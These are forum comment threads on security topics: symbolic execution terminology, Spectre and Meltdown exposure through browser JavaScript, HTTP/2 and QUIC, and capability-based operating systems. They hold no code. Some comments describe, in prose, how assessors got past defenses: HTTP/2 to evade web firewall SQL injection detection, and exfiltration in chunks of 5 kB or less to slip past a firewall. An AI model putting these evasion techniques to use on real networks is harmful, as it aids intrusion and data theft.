1. 2

    Always nice to see these sort of comprehensive overviews, since I always feel like the space is a bit overwhelming to know where to start learning.

    One question, not necessarily related to the material at hand, but something that stuck out at me:

    Soundness prevents false negatives, i.e., all possible unsafe inputs are guaranteed to be found, while completeness prevents false positives, i.e., input values deemed unsafe are actually unsafe.

    Did anyone else learn these definitions as switched from the above? In my education (and in informal usage of the terms), “sound” meant “if you’re given an answer, it is actually valid” whereas “complete” meant “if it’s valid, it’ll be guaranteed to be given as an answer” (e.g. so certain logic programmings might be sound but not complete), which is the opposite. Do different sub-disciplines use these terms in the other way that I learned it? (Or, did I learn it incorrectly?)

    1. 1

      Sorry for the late reply, this week has been trying!

      Wikipedia says it better than I will:

      In mathematical logic, a logical system has the soundness property if and only if every formula that can be proved in the system is logically valid with respect to the semantics of the system.

      “Complete” is a bit more complex, but basically something is complete when you can use it to derive every formula within the system. There are slight differences based one what completeness element you’re discussing, such as complete formal languages vs complete logical semantics.

      I don’t think you learnt it incorrectly, just probably focused on the area you were learning. Wrt the section outlined, the difference there is that you can either detect all possibly unsafe inputs (they are guaranteed to be logically valid for the domain and thus possibly unsafe) OR you can ensure that everything found is actually unsafe (i.e. it actually expresses the nature of “un-safety” to a particular program’s semantics).

      Does that make more sense? It’s quite early here and I’m still ingesting caffeine, so I apologize if not…

    1. 3

      I was going to ask questions about “the kernel stack is executable”, but then I saw “MIPS”

      1. 2

        Interestingly, @brucem and I had that conversation point this morning as well, since MIPS limits options with certain things, but also brings new restrictions.

      1. 4

        $work:

        • I’m on research week, so more symbolic execution and future of smart contract stuff
        • some report editing
        • fixing up some client tooling
        • looking into some F# stuff I’m seeing in the space

        !$work:

        • I removed 369 lines of type parsing code from my compiler, which resulted from a simple grammar change I made
        • need to finish some more work on the match form
        • I’ve started stubbing out a new CTF I’m working on, a historical CTF with historical machines & languages
        1. 2

          Any more info on the historical CTF? That sounds really interesting.

          1. 2

            so I’ve written a historical CTF once before: Gopher, a modified RSH, and MUSH running atop Inferno, which was pretty interesting.

            For this one, I’d like to have a MULTICS/PR1MOS-like system and a VMS/TWENEX-like system that players must attack and defend. The code would be written in languages appropriate for those two systems (like a DCL-clone, some Algol clones, and so one), with flags planted throughout. It’s a lot of work, but I think the result would be really fun, if quite challenging for participants (new languages, structures, protocols).

        1. 15

          Your thinkpad is shared infrastructure on which you run your editor and forty-seven web sites run their javascripts. If that a problem for you?

          1. 2

            Mmm what did you mean by this? I didn’t get it.

            1. 13

              In We Need Assurance, Brian Snow summed up much of the difficulty securing computers:

              “The problem is innately difficult because from the beginning (ENIAC, 1944), due to the high cost of components, computers were built to share resources (memory, processors, buses, etc.). If you look for a one-word synopsis of computer design philosophy, it was and is SHARING. In the security realm, the one word synopsis is SEPARATION: keeping the bad guys away from the good guys’ stuff!

              So today, making a computer secure requires imposing a “separation paradigm” on top of an architecture built to share. That is tough! Even when partially successful, the residual problem is going to be covert channels. We really need to focus on making a secure computer, not on making a computer secure – the point of view changes your beginning assumptions and requirements! “

              Although security features were added, the fact that many things are shared and closer together only increased over time to meet market requirements. Then, researchers invented hundreds of ways to secure code and OS kernels, Not only were most ignored, the market shifted to turning browsers into OS’s running a malicious code in a harder-to-analyze language whose compiler (JIT) was harder to secure due to timing constraints. Only a handful of projects in high-security, like IBOS and Myreen, even attempted it. So, browsers running malicious code are a security threat in a lot of ways.

              That’s a subset of two, larger problems:

              1. Any code in your system that’s not verified to have specific safety and security properties might be controlled by attackers upon malicious input.

              2. Any shared resource might leak your secrets to a malicious observer via covert channels, storage or timing. Side channels are basically the same concept applied more broadly, like in physical world. Even the LED’s on your PC might internal state of the processor depending on design.

              1. 2

                Hmm. I had a friend yonks ago who worked on BAE’s STOP operating system, that supposedly uses complex layers of buffers to isolate programs. I wonder how it’s stood up against the many CPU vulnerabilities.

                1. 4

                  I’ve been talking about STOP for a while but rarely see it. Cool you knew someone that worked on it. Its architecture is summarized here along with GEMSOS’s. I have a detailed one for GEMSOS tomorrow, too, if not previously submitted. On the original implementation (SCOMP), the system also had an IOMMU that integrated with the kernel. That concept was re-discovered some time later.

                  Far as your question, I have no idea. These two platforms, along with SNS Server, have had no reported hacks for a long time. You know they have vulnerabilities, though. The main reasons I think the CPU vulnerabilities will effect them is (a) they’re hard to avoid and (b) certification requirements mean they rarely change these systems. They’re probably vulnerable, esp to RAM attacks. Throw network Rowhammer at them. :)

                2. 2

                  Thanks, that was really interesting and eye opening on the subject. I never saw it that way! :)

                3. 5

                  I think @arnt is saying that website JavaScript can exploit CPU bugs, so by browsing the internet you are “shared infrastructure”.

                  1. 6

                    Row Hammer for example had a JavaScript implementation, and Firefox (and others) have introduced mitigations to prevent those sorts of attacks. Firefox also introduced mitigations for Meltdown and Spectre because they could be exploited from WASM/JS… so it makes sense to mistrust any site you load on the internet, especially if you have an engine that can JIT (but all engines are suspect; look at how many pwn2own wins are via Safari or the like)

                    1. 3

                      If browsers have builtin mitigation for this sort of thing, isn’t this an argument in favor of disabling the OS-level mitigation? Javascript is about the only untrusted code that I run on my machine so if that’s already covered I don’t see a strong reason to take a hit on everything I run.

                      1. 4

                        I think the attack surface is large enough even with simple things like JavaScript that I’d be willing to take the hit, though I can certainly understand certain workloads where you wouldn’t want to, like gaming or scientific computing.

                        For example, JavaScript can be introduced in many locations, like PDFs, Electron, and so on. Also, there are things like Word documents such as this RTF remote code execution for MS Word. Additionally, the mitigations for Browsers are just that, mitigations; things like retpolines and the like work in a larger setting with more “surface area” covered, vs timing mitigations or the like in browsers. It’s kinda like W^X page protections or ASLR: the areas you’d need that are quite small, but it’s harder to find individual applications with exploits and easier to just apply it wholesale to the entire system.

                        Does that make sense?

                        tl;dr: JS is basically everywhere in everything, so it’s harder to just apply those fixes in a single location like a browser, when other things may have JS exposed as well. Further more, there are other languages, attack surfaces, and the like I’d be concerned about that it’s just not worth it to only rely on browsers, which can only implement partial mitigations.

                        1. 1

                          Browsers do run volatile code supplied by others more than most other attack surfaces. You may have an archive of invoices in PDF format, as I have, and those may in principle contain javascript, but those javascripts aren’t going to change all of a sudden, and they all originate from a small set of parties (in my case my scanning software and a single-digit number of vendors). Whereas example.com may well redeploy its website every Tuesday morning, giving you a the latest versions of many unaidited third-party scripts, and neither you nor your bank’s web site really trust example.com or its many third-party scripts.

                          IMO that quantitative difference is so large as to be described as qualitative.

                          1. 1

                            The problem is when you bypass those protections you can have things like this NitroPDF exploit, which uses the API to launch malicious JS. I’ve used these sorts of exploits on client systems during assessments, adversarial or otherwise. So relying on one section of your system to protect you against something that is a fundamental CPU design flaw can be problematic; there’s nothing really stopping you from launching rowhammer from PostScript itself, for example. This is why the phrase “defense in depth” is so often mentioned in security circles, since there can be multiple failures throughout a system, but in a layered approach you can catch it at one of the layers.

                            1. 1

                              Oh, I’m not arguing that anyone should leave out everything except browser-based protection. Defense in depth is indisputably good.

                        2. 3

                          There’s also the concept of layers of defense. Let’s say the mitigation fails. Then, you want the running, malicious code to be sandboxed somehow by another layer of defense. You might reduce or prevent damage. The next idea folks had was mathematically-prove the code could never fail. What if a cosmic ray flips a bit that changes that? Uh oh. Your processor is assumed to enable security, you’re building an isolation layer on it, make it extra isolated just in case shared resources have effect, and now only one of Spectre/Meltdown affected you if you’re Muen. Layers of security are still good idea.

                      2. 2

                        That’s not what I got from it. I perceived it as “You’re not taking good precautions on this low hanging fruit, why are you worried about these hard problems?”

                        I see it constantly, everyone’s always worried about X, and then they just upload everything to an unencrypted cloud.

                        1. 1

                          I actually did mean that when you browse the net, your computer runs code supplied by web site operators you may not trust, and some of those web site operators really are not trustworthy, and your computer is shared infrastructure running code supplied by users who don’t trust each other.

                          Your bank’s site does not trust those other sites you have open in other tabs, so that’s one user who does not trust others.

                          You may not trust them, either. A few hours after I posted that, someone discovered that some npmjs package with millions of downloads has been trying to steal bitcoin wallets, so that’s millions of pageviews that ran malevolent code on real people’s computers. You may not have reason to worry in this case, but you cannot trust sites to not use third-party scripts, so you yourself also are a distrustful user.

                    2. 2

                      This might be obvious, but I gotta ask anyway: Is there a real threat to my data when I, let’s say, google for a topic and open the first blog post that seems quite right?

                      • Would my computer be breached immediately (like I finished loading the site and now my computers memory is in north korea)?
                      • How much data would be lost, and would the attacker be able to read any useful information from it?
                      • Would I be infected with something?

                      Of course I’m not expecting any precise numbers, I’m just trying to get a feel for how serious it is. Usually I felt safe enough just knowing which domains and topics (like pirated software, torrents, pron of course) to avoid, but is that not enough anymore?

                      1. 5

                        To answer your questions:

                        Would my computer be breached immediately (like I finished loading the site and now my computers memory is in north korea)?

                        Meltdown provides read-access to privileged memory (including enclave-memory) at rates of a couple of megabits per second (lets assume 4). This means that if you have 8GB of ram it is now possible to dump the entire memory of your machine in about 4,5 hours.

                        How much data would be lost, and would the attacker be able to read any useful information from it?

                        This depends on the attackers intentions. If they are smart, they just read the process table, figure out where your password-manager or ssh-keys for production are stored in ram and transfer the memory-contents of those processes. If this is automated, it would take mere seconds in theory, in practice it won’t be that fast but it’s certainly less than a minute. If they dump your entire memory, it will probably be all data in all currently running applications and they will certainly be able to use it since it’s basically a core dump of everything that’s currently running.

                        Would I be infected with something?

                        Depends on how much of a target you are and whether or not the attacker has the means to drop something onto your computer with the information gained from what I described above. I think it’s safe to assume that they could though.

                        These attacks are quite advanced and regular hackers will always go for the low-hanging fruit first. However if you are a front-end developer in some big bank, big corporation or some government institution which could face a threat from competitors and/or economic espionage. The answer is probably yes. You are probably not the true target the attackers are after, but you system is one hell of a springboard towards their real target.

                        It’s up to you to judge how much of a potential target you are, but when it happens, you do not want to be that guy/girl with the “patient zero”-system.

                        Usually I felt safe enough just knowing which domains and topics (like pirated software, torrents, pron of course) to avoid, but is that not enough anymore?

                        Correct. Is not enough anymore, because Rowhammer, Spectre and Meltdown have JavaScript or wasm variants (If they didn’t we wouldn’t need mitigations in browsers). All you need is a suitable payload (the hardest part by far) and one simple website you frequently visit, which runs on an out-of-date application (like wordpress, drupal or yoomla for example) to get that megabit-memory-reading meltdown-attack onto a system.

                        The attacker still has to know which websites those are, but they could send you a phishing-mail which has a link or some attachment that will be opened in some environment which has support for javascript (or something else) to obtain your browsing history. In that light it’s good to know that some e-mail clients support the execution of javascript in received e-mail messages

                        If there is one lesson to take home from rowhammer, spectre and meltdown, it’s that there is no such thing as “computer security” anymore and that we cannot rely on the security-mechanisms given to us by the hardware.

                        If you are developing sensitive stuff, do it on a separate machine and avoid frameworks, libraries, web-based tools, other linked in stuff and each and every extra tool like the plague. Using an extra system, abandoning the next convenient tool and extra security precautions are annoying and expensive, but it’s not that expensive if your livelihood depends on it.

                        The central question is: Do you have adversaries or competitors willing to go this far and spend about half a million dollars (my guesstimate of the required budget) willing to pull off an attack like this?

                        1. 1

                          Wow, thanks! Assuming you know what you’re talking about, your response is very useful and informative. And exactly what I was looking for!

                          […] figure out where your password-manager or ssh-keys for production are stored in ram […]

                          That is a vivid picture of the worst thing I could imagine, albeit I would only have to worry about my private|hobby information and deployment.

                          Thanks again!

                          1. 1

                            You’re welcome!

                            I have to admit that what I wrote above, is the worst case scenario I could come up with. But it is as the guys from Sonatype (from the Maven Nexus repository) stated it once: “Developers have to become aware of the fact that what their laptops produce at home, could end up as a critical library or program in a space station. They will treat and view their infrastructure, machines, development processes and environments in a fundamentally different way.”

                            Yes, there are Java programs and libraries from Maven Central running in the ISS.

                        2. 1

                          The classic security answer to that is that last years’s theoretical attack is this year’s nation-state attack and next year it can be carried out by anyone who has an midprice GPU. Numbers change, fast. Attacks always get better, never worse.

                          I remember seeing an NSA gadget for $524000 about ten years ago (something to spy on ethernet traffic, so small as as be practically invisible), and recently a modern equivalent for sale for less than $52 on one of the Chinese gadget sites. That’s how attacks change.

                      1. 29

                        I share the author’s frustrations, but I doubt the prescriptions as presented will make a big difference, partly because they have been tried before.

                        And they came up with Common Lisp. And it’s huge. The INCITS 226–1994 standard consists of 1153 pages. This was only beaten by C++ ISO/IEC 14882:2011 standard with 1338 pages some 17 years after. C++ has to drag a bag of heritage though, it was not always that big. Common Lisp was created huge from the scratch.

                        This is categorically untrue. Common Lisp was born out of MacLisp and its dialects, it was not created from scratch. There was an awful lot of prior art.

                        This gets at the fatal flaw of the post: not addressing the origins of the parts of programming languages the author is rejecting. Symbolic representation is mostly a rejection of verbosity, especially of that in COBOL (ever try to actually read COBOL code? I find it very easy to get lost in the wording) and to more closely represent the domains targetted by the languages. Native types end up existing because there comes a time where the ideal of maths meets the reality of engineering.

                        Unfortunately, if you write code for other people to understand, you have to teach them your language along with the code.

                        I don’t get this criticism of metaprogramming since it is true of every language in existence. If you do metaprogramming well, you don’t have to teach people much of anything. In fact, it’s the programmer that has to do the work of learning the language, not the other way around.

                        The author conveniently glosses over the fact that part of the reason there are so many programming languages is that there are so many ways to express things. I don’t want to dissuade the author from writing or improving on COBOL to make it suitable for the 21st century; they can even help out with the existing modernization efforts (see OO COBOL), although they may be disappointed to find out COBOL is not really that small.

                        If you do click through and finish the entire post you’ll see the author isn’t really pushing for COBOL. The key point is made: “Aren’t we unhappy with the environment in general?” This, I agree, is the main problem. No solution is offered, but there is a decent sentiment about responsibility.

                        1. 1

                          Also if you want a smaller Lisp than CL with many of it’s more powerful features, there’s always ISLisp, which is one of the more under-appreciated languages I’ve seen. It has many of the nicer areas of CL, with the same syntax (unlike Dylan which switched to a more Algol-like), but still has a decent specification weighing in at a mere 134 pages.

                        1. 10

                          That was a surprisingly fun quick read.

                          As an example of another language that would foot the bill but be more…modern than the one described in TFA (no spoilers) would be REBOL.

                          It was the path not taken, sadly.

                          1. 9

                            You might be aware, but Red is following that path. But they’ve gone off on a cryptocurrency tangent; I’m not quite sure what’s going on there anymore.

                            1. 4

                              I think dialecting ala Rebol is super interesting, but I also think this sort of “wordy” input like AppleScript and DCL will eventually just become short forms that often require just as much effort to read later… that’s how you’d have things like show device... foreshortened to sho dev ....

                              Having said that, SRFI-10 or #. form from CommonLisp is a happy medium, I think.

                              1. 3

                                that’s how you’d have things like show device… foreshortened to sho dev

                                I have not been responsible for a Cisco router in at least 15 years but I still find myself typing “sh ip int br” on occasion.

                                1. 2

                                  hahahaha oh lord, I know what you mean. I still have ancient devices burned in my brain as well, like OpenVMS and what not. Still, I think it goes to show that making things more “natural language-like” doesn’t really mean we want to write like that… there’s probably some balance to be struck between succinctness and power that we haven’t figured out yet

                              2. 2

                                I also loved the bit of engagement at the end with the buttons. Been a string of really well written (light) technical articles lately, hope the trend continues.

                                I ported a REBOL app (using the full paid stack) to C# – the code inflation and challenge of making a 1:1 exact copy (no retraining port) was phenomenal. Most stuff took nearly an order of magnitude more code. There were some wins (dynamic layouts, resizing, performance) – but REBOL had shockingly good bang for the buck and dialects only really took a few days to grok.

                              1. 7

                                Pentesters always want to sound like it’s some sort of action movie, and I am tired of it.

                                Good on the company for having their security in order. Breaking in and prying out disks of laptops in storage is a bit over the top.

                                1. 14

                                  The hardest part of any security job is communicating your findings effectively to your audience.

                                  A pen-test of a corporate network is not the most exciting topic in the world of security so I’m sure attempts at adding some drama and a story helps.

                                  1. 4

                                    Depends on the scope of the assessment; I have had clients that have wanted me to break into things, and device theft was definitely in scope. Working adversary simulation, OPFOR, whatever, has different scope. On the flip side, I’ve definitely seen pentesters/red teamers who just want to “win” regardless of the scope or cost. This provides almost nothing of value to a client: if they knew their physical security was weak, breaking into the data center provides nothing to a client who wanted to know how well their validation schemes worked.

                                    I remember once being on site with another company that usually did “full scope” assessments as their bread-and-butter. The first day of their web app test, they:

                                    • tried to unplug a phone
                                    • spoof the phone’s MAC address
                                    • bypass network restrictions and NAC via the phone to get to a database

                                    on a web app… The client wanted to know about their web app, not their network security (which was actually fairly decent). Anyway, I finished my application early and was asked to step in and take over that assessment…

                                  1. 8

                                    $work:

                                    • finishing a symbolic execution engine for a client’s custom programming language; need to add more primitives, and add my computation traces to an actual SMT.
                                    • assessment work
                                    • writing some templates for our findings, some sales engineering and client meetings
                                    • Talk on blockchain security

                                    !$work:

                                    • finally finishing pattern matching in carML
                                    • adding some more threat hunting items to wolf-lord
                                    1. 2

                                      How did your client end up with a custom programming language?

                                      1. 2

                                        believe it or not, it’s surprisingly common in the blockchain space, esp wrt validator languages for proof of authority, as well as for “novel” smart contract languages.

                                    1. 15

                                      Q: is the HTTP protocol really the problem that needs fixing?

                                      I’m under the belief that if the HTTP overhead is causing you issues then there are many alternative ways to fix this that don’t require more complexity. A site doesn’t load slowly because of HTTP, it loads slowly because it’s poorly designed in other ways.

                                      I’m also suspicious by Google’s involvement. TCP HTTP 1.1 is very simple to debug and do by hand. Google seems to like closing or controlling open things (Google chat support for XMPP, Google AMP, etc). Extra complexity is something that should be avoided, especially for the open web.

                                      1. 10

                                        They have to do the fix on HTTP because massive ecosystems already depend on HTTP and browsers with no intent to switch. There’s billions of dollars riding on staying on that gravy train, too. It’s also worth noting lots of firewalls in big companies let HTTP traffic through but not better-designed protocols. The low-friction improvements get more uptake by IT departments.

                                        1. 7

                                          WAFs and the like barely support HTTP/2 tho; a friend gave a whole talk on bypasses and scanning for it, for example

                                          1. 6

                                            Thanks for feedback. I’m skimming the talk’s slides right now. So far, it looks like HTTP/2 got big adoption but WAF’s lagged behind. Probably just riding their cash cows minimizing further investment. I’m also sensing business opportunity if anyone wants to build a HTTP/2 and /3 WAF that works with independent testing showing nothing else or others didn’t. Might help bootstrap the company.

                                            1. 3

                                              ja, that’s exactly correct: lots of the big-name WAFs/NGFWs/&c. are missing support for HTTP/2 but many of the mainline servers support it, so we’ve definitely seen HTTP/2 as a technique to bypass things like SQLi detection, since they don’t bother parsing the protocol.

                                              I’ve also definitely considered doing something like CoreRuleSet atop HTTP/2; could be really interesting to release…

                                              1. 4

                                                so we’ve definitely seen HTTP/2 as a technique to bypass things like SQLi detection, since they don’t bother parsing the protocol.

                                                Unbelievable… That shit is why I’m not in the security industry. People mostly building and buying bullshit. There’s exceptions but usually setup to sell out later. Products based on dual-licensed code are about only thing immune to vendor risk. Seemingly. Still exploring hybrid models to root out this kind of BS or force it to change faster.

                                                “I’ve also definitely considered doing something like CoreRuleSet atop HTTP/2; could be really interesting to release…”

                                                Experiment however you like. I can’t imagine what you release being less effective than web firewalls that can’t even parse the web protocols. Haha.

                                                1. 5

                                                  Products based on dual-licensed code

                                                  We do this where I work, and it’s pretty nice, tho of course we have certain things that are completely closed source. We have a few competitors that use our products, so it’s been an interesting ecosystem to dive into for me…

                                                  Experiment however you like. I can’t imagine what you release being less effective than web firewalls that can’t even parse the web protocols. Haha.

                                                  pfff… there’s a “NGFW” vendor I know that…

                                                  • when it sees a connection it doesn’t know, analyzes the first 5k bytes
                                                  • this allows the connection to continue until the 5k+1 byte is met
                                                  • subsequently, if your exfiltration process transfers data in packages of <= 5kB, you’re ok!

                                                  we found this during an adversary simulation assessment (“red team”), and I think it’s one of the most asinine things I’ve seen in a while. The vendor closed it as works as expected

                                                  edit fixed the work link as that’s a known issue.

                                                  1. 3

                                                    BTW, Firefox complains when I go to https://trailofbits.com/ that the cert isn’t configured properly…

                                                    1. 2

                                                      hahaha Nick and I were just talking about that; its been reported before, I’ll kick it up the chain again. Thanks for that! I probably should edit my post for that…

                                                      1. 2

                                                        Adding another data point: latest iOS also complains about the cert

                                          2. 3

                                            They have to do the fix on HTTP

                                            What ‘fix’? Will this benefit anyone other than Google?

                                            I’m concerned that if this standard is not actually a worthwhile improvement for everyone else, then it won’t be adopted and IETF will lose respect. I’m running on the guess that’s it’s going to have even less adoption than HTTP2.

                                          3. 13

                                            I understand and sympathize with your criticism of Google, but it seems misplaced here. This isn’t happening behind closed doors. The IETF is an open forum.

                                            1. 6

                                              just because they do some subset of the decision making in the open shouldn’t exempt them from blame

                                              1. 3

                                                Feels like Google’s turned a lot public standards bodies into rubber stamps for pointless-at-best, dangerous-at-worst standards like WebUSB.

                                                1. 5

                                                  Any browser vendor can ship what they want if they think that makes them more attractive to users or what not. Doesn’t mean it’s a standard. WebUSB has shipped in Chrome (and only in Chrome) more than a year ago. The WebUSB spec is still an Editor’s Draft and it seems unlikely to advance significantly along the standards track.

                                                  The problem is not with the standards bodies, but with user choice, market incentive, blah blah.

                                                  1. 3

                                                    Feels like Google’s turned a lot public standards bodies into rubber stamps for pointless-at-best, dangerous-at-worst standards like WebUSB.

                                                    “WebUSB”? It’s like kuru crossed with ebola. Where do I get off this train.

                                                  2. 2

                                                    Google is incapable of doing bad things in an open forum? Open forums cannot be influenced in bad ways?

                                                    This does not displace my concerns :/ What do you mean exactly?

                                                    1. 4

                                                      If the majority of the IETF HTTP WG agrees, I find it rather unlikely that this is going according to a great plan towards “closed things”.

                                                      Your “things becoming closed-access” argument doesn’t hold, imho: While I have done lots of plain text debugging for HTTP, SMTP, POP and IRC, I can’t agree with it as a strong argument: Whenever debugging gets serious, I go back to writing a script anyway. Also, I really want the web to become encrypted by default (HTTPS). We need “plain text for easy debugging” to go away. The web needs to be great (secure, private, etc.) for users first - engineers second.

                                                      1. 2

                                                        That “users first-engineers second” mantra leads to things like Apple and Microsoft clamping down on the “general purpose computer”-think of the children the users! They can’t protect themselves. We’re facing this at work (“the network and computers need to be secure, private, etc) and it’s expected we won’t be able to do any development because of course, upper management doesn’t trust us mere engineers with “general purpose computers”. Why can’t it be for “everybody?” Engineers included?

                                                        1. 1

                                                          No, no, you misunderstand.

                                                          The users first / engineers second is not about the engineers as end users like in your desktop computer example.

                                                          what I mean derives from the W3C design principles. That is to say, we shouldn’t avoid significant positive change (e.g., HTTPS over HTTP) just because it’s a bit harder on the engineering end.

                                                          1. 6

                                                            Define “positive change.” Google shoved HTTP/2 down our throats because it serves their interests not ours. Google is shoving QUIC down our throats because again, it serves their interests not ours. That it coincides with your biases is good for you; others might feel differently. What “positive change” does running TCP over TCP give us (HTTP/2)? What “positive change” does a reimplementation of SCTP give us (QUIC)? I mean, other than NIH syndrome?

                                                            1. 3

                                                              Are you asking what how QUIC and H2 work or are you saying performance isn’t worth improving? If it’s the latter, I think we’ve figured out why we disagree here. If it’s the former, I kindly ask you to find out yourself before you enter this dispute.

                                                              1. 3

                                                                I know how they work. I’m asking, why are they reimplementing already implemented concepts? I’m sorry, but TCP over TCP (aka HTTP/2) is plain stupid—one lost packet and every stream on that connection hits a brick wall.

                                                                1. 1

                                                                  SPDY and its descendants are designed to allow web pages with lots of resources (namely, images, stylesheets, and scripts) to load quickly. A sizable number of people think that web pages should just not have lots of resources.

                                                  1. 1

                                                    Super interesting post; I deal with this quite a bit during assessments of blockchain code that use TypeScript on the front end, and discussing “why you can’t use floats for currency” often comes up. I like what I’m seeing here tho; I don’t know if I can directly recommend to clients, but it’s an interesting discussion point for me to use.

                                                    1. 3

                                                      Yep, dealing with the actual monetary values is another big topic which I didn’t really bother to cover here, mostly because I think it’s already been covered in detail (Javascript, Haskell). Thankfully to turn them into bills and coins I only have to deal with the resulting values; all the heavy lifting in my project is done by Dinero.js with this typings file.

                                                      1. 1

                                                        that’s really interesting, thanks for that!

                                                        Where I usually see issues with clients is code that has two different rounding mechanisms (such as between their own bespoke safemath library for Ethereum and JavaScript). It’s an interesting discussion point to be had, and those links are also interesting, thanks for those!

                                                        1. 1

                                                          Good links, dude!

                                                      1. 3

                                                        $work:

                                                        • reaping the joy of automating a bunch of infrastructure by bringing up a few new instances of our app in various geolocations for local use there. Super satisfying seeing the work we put in ahead of time pay off. (We knew a few months ago we’d absolutely have to do this, so it was just a case of when not if.)

                                                        !$work:

                                                        • Monthly pub quiz with family
                                                        • Finally got the spare Microserver booting reliably from the SSD (… by making it boot from USB which then loads everything from the SSD. Three cheers for grub.) which means I need to invest some time into making everything run on the server now.
                                                        • Flying to Madrid on Friday for a long weekend visit. First time visiting Spain 🇪🇸, really looking forward to it. (Not taking a laptop 🙃)
                                                        1. 2

                                                          I like this format, gonna steal it :)

                                                          1. 2

                                                            Hah, more than welcome to. Fairly sure I’m just regurgitating prior art from other people on these threads previously. 😁

                                                        1. 7

                                                          When I first read about Capsicum back in 2010 I thought it was a very cool idea, much like the later pledge system call in OpenBSD. I especially liked the idea that they introduced Capsicum calls to Google Chromium, as browsers are just piles and piles of code that you just generally have to trust. It’s just really unfortunate that these things are all tied to a specific operating system.

                                                          I wonder if those Capsicum changes were ever accepted upstream and are still maintained?

                                                          1. 21

                                                            It was intended to be cross-platform concept. Lots of the big companies have Not Invented Here syndrome which sort of ties into them liking to control and patent anything they depend on, too. Examples:

                                                            1. Google’s NaCl was weaker, but faster, than capability security. Just used Java and basic permissions for Android.

                                                            2. Microsoft Research made a lot of great stuff but Windows division only applies tiniest amount of what they do.

                                                            3. I saw a paper once about Apple trying to integrate Capsicum into Mac OS. I’m not sure if that went anywhere.

                                                            4. Linux tried a hodgepodge of things with SELinux containing most malware at one point. It was a weaker version of what MLS and Type Enforcement branches of high security were doing in LOCK project. These days, it’s even more hodgepodge with lots of techniques focused on one kind of protection or issue sprinkled all over the ecosystem. Too hard to evaluate its actual security.

                                                            5. FreeBSD, under TrustedBSD, was originally doing something like SELinux, too. Capsicum team gave them capability-security. That’s probably better match for today’s security policies. However, one might be able to combine features from each project for stronger security.

                                                            6. OpenBSD kept a risky architecture but did ultra-strong focus on code review and mitigations for specific attacks. It’s also hard to evaluate. It should be harder to attack, though, since most attackers focus on coding errors.

                                                            7. NetBSD and DragonflyBSD. I have no idea what their state of security is. Capsicum might be easy to integrate into NetBSD given they design for portability and easy maintenance.

                                                            8. High-security kernels. KeyKOS and EROS were all-in on the capability model. Separation kernels usually have capabilities as a memory access and/or communication mechanism, but policies are neutral for various security models. The consensus in high-assurance security is that the above OS’s need to be sandboxed entirely in their own process/VM space since there’s too much risk of them breaking. Security-critical components are to run outside of them on minimal runtimes and/or tiny kernels directly. These setups use separation kernels with VMM’s designed to work with them and something to generate IPC automatically for developer convenience. Capsicum theoretically could be ported to one but they’re easier to use directly.

                                                            9. Should throw in IBM i series (formerly AS/400). The early version, System/38, described in this book was capability-secure at the hardware level. They appear to have ditched hardware protections in favor of software checks. Unless I’m dated on it, it’s still a capability-based architecture at low levels of the system with PowerVM used to run Linux side-by-side to get its benefits. That makes it a competitor to Capsicum and longest-running capability-based product in the market. Whereas, longest-running descriptor architecture, which also ditched full protections in hardware, is Burroughs 5500 sold by Unisys as ClearPath Libra in modern form.

                                                            1. 5

                                                              Nice listing, thanks! If you haven’t heard of it, and going in a slightly different direction, you may be interested in CheriBSD which is a port of FreeBSD on top of capability hardware, the CHERI machine. (This makes it undeployable pretty much anymore, but it’s interesting research that I expect to pay dividends in many ways.) The core people working on Capsicum are also working on CHERI.

                                                              1. 4

                                                                My post was for software stuff mainly. On hardware side, I’m following that really closely along with research like Criswell’s SVA-OS (FreeBSD-based) and Hardbound/Watchdog folks. They’re all doing great work of making fundamental problems disappear with minimal, performance hit. I was pushing some hardware people to port CHERI to Rocket RISC-V. There weren’t any takers. One company ported SAFE to RISC-V as CoreGuard.

                                                                CHERI is still one of my favorite possibilities, though. I plan to run CheriBSD if I ever get a hold of a FPGA board and the time to make adjustments.

                                                              2. 3

                                                                Wow, thank you for the extremely thorough reply (this is the sort of thing I really like about the lobste.rs community)!

                                                                It makes sense that there are multiple experiments and various OSes having a completely different approach (the hardware protection of System/38 you mentioned sounds particularly interesting), but I was mostly thinking about the POSIX OSes. The Capsicum design fits quite well into the POSIX model of the world.

                                                                I wonder why Apple did not follow through with Capsicum. They’re not too afraid to take good ideas from other OSes (dtrace comes to mind, and their userland comes mostly from FreeBSD IIRC).

                                                                1. 3

                                                                  Capsicum might be easy to integrate into NetBSD given they design for portability and easy maintenance

                                                                  There was a port of CloudABI to NetBSD, which kind of “includes” Capsicum (just not for NetBSD-native binaries).

                                                                  one might be able to combine features from each project for stronger security

                                                                  Indeed. Sandboxes protect the world from applications touching things they’re not supposed to, MAC things like TrustedBSD and SELinux were (at least originally) designed to implement policies on an organizational level, like documents having sensitivity levels (not secret, secret, top secret) and people having access to levels only lower than some value, etc.

                                                                  1. 2

                                                                    Re CloudABI. Thanks for the tip.

                                                                    Re 2nd paragraph. You’re on right track but missing the overlap. SELinux came from reference monitor concept where every subject/object access was denied by default unless a security policy allowed it. So, sandboxing or, more properly, an isolation architecture done strong as possible was the first layer. If anything, modern sandboxing is weaker at same goal by lacking enforcement consistently by simple mechanism.

                                                                    From there, you’re right that organizational design often influenced the policies. Since military invented most INFOSEC, their rules, Multilevel Security, became default which commercial sector couldnt do easily. Type Enforcement was more flexible, doing military and some commercial designs. Note you could also do stuff like Biba to stop malware (deployed in Windows, too), enforcing database integrity, or even some for competing companies to make sure they didnt share resources. The mechanism itself wasn’t rooted in organizational stuff. That helped adoption.

                                                                    Eventually they just dropped policy enforcement out of kernel entirely so it just did separation. Middleware enforced custom policy. Still hotly debated since it’s most flexible but gived adopters plenty of rope. Hence, language-based coming back with strong type systems and hardware/software schemes mitigating attacks entirely.

                                                                  2. 2

                                                                    High-security kernels.

                                                                    just to add, there’s also Coyotos in the EROS family, which gave us BitC, which is an interesting (if dead) language.

                                                                    Zircon is also working on an object capability model, but I haven’t looked too deeply at it myself.

                                                                    edit: Also, CapLore has some really interesting articles, such as this one on KeyKos…

                                                                    1. 2

                                                                      Yeah, they were interesting. People might find neat ideas looking into them. I left them off cuz Shapiro got poached by Microsoft before completing them.

                                                                      Far as Zircon, someone told me the developers were ex-Be, Danger, Palm, and Apple. None of those companies made high-security projects. The developers may or may not have at another company or in spare time. This is important to me given the only successes seem to come from people that learned the real thing from experienced people. Google’s NIH approach seems to consistently dodge using such people. Whereas, Microsoft and IBM played it wise hiring experts from high-security projects to do their initiatives. Got results, too. Google should’ve just hired CompSci folks specialized in this like the NOVA people. Them plus some industry folks like on Zircon to keep things balanced between ideal architecture and realistic compromise.

